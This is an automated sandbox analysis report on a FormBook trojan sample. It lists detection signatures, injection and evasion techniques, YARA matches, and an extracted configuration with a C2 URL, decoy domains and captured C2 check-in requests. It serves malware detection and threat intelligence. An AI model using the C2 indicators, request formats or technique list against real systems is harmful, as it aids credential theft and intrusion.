Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report nji3Lg1ot6

Overview

General Information

Sample Name:nji3Lg1ot6 (renamed file extension from none to exe)
Analysis ID:552997
MD5:8eddcc35719034649f6947b2b08bcdf3
SHA1:5506b69b4584f43232f45299192a540ec0197998
SHA256:0d072a60b433f330d2ba97d75eae7af07e9d75bc6ed5b1065287661d05e82ab6
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • nji3Lg1ot6.exe (PID: 5092 cmdline: "C:\Users\user\Desktop\nji3Lg1ot6.exe" MD5: 8EDDCC35719034649F6947B2B08BCDF3)
    • nji3Lg1ot6.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\nji3Lg1ot6.exe" MD5: 8EDDCC35719034649F6947B2B08BCDF3)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autochk.exe (PID: 6480 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • msiexec.exe (PID: 1304 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 7156 cmdline: /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x16a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x1191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x17a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x191f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x40c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x7917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x891a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.0.nji3Lg1ot6.exe.400000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.0.nji3Lg1ot6.exe.400000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.0.nji3Lg1ot6.exe.400000.2.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18839:$sqlite3step: 68 34 1C 7B E1
        • 0x1894c:$sqlite3step: 68 34 1C 7B E1
        • 0x18868:$sqlite3text: 68 38 2A 90 C5
        • 0x1898d:$sqlite3text: 68 38 2A 90 C5
        • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
        1.2.nji3Lg1ot6.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.nji3Lg1ot6.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 28 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: nji3Lg1ot6.exeVirustotal: Detection: 37%Perma Link
          Source: nji3Lg1ot6.exeReversingLabs: Detection: 41%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: nji3Lg1ot6.exeJoe Sandbox ML: detected
          Source: 7.2.msiexec.exe.4baf840.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.msiexec.exe.2c5b358.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: nji3Lg1ot6.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: msiexec.pdb source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: nji3Lg1ot6.exe, 00000000.00000003.294014026.0000000003090000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000000.00000003.290725743.0000000003220000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: nji3Lg1ot6.exe, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 23.227.38.74:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.alibabasdeli.com
          Source: C:\Windows\explorer.exeDomain query: www.nanasyhogar.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.173.57 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 50.31.177.38 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.gigasupplies.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.rthearts.com/nk6l/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf HTTP/1.1Host: www.nanasyhogar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf HTTP/1.1Host: www.alibabasdeli.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf HTTP/1.1Host: www.gigasupplies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 14 Jan 2022 02:39:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 188X-Sorting-Hat-ShopId: 60258091197X-Dc: gcp-europe-west1X-Request-ID: 077675b5-2854-474a-9745-e2e99dc925ceX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6cd37e035a694e0e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
          Source: nji3Lg1ot6.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: nji3Lg1ot6.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: unknownDNS traffic detected: queries for: www.nanasyhogar.com
          Source: global trafficHTTP traffic detected: GET /nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf HTTP/1.1Host: www.nanasyhogar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf HTTP/1.1Host: www.alibabasdeli.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf HTTP/1.1Host: www.gigasupplies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404F61

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
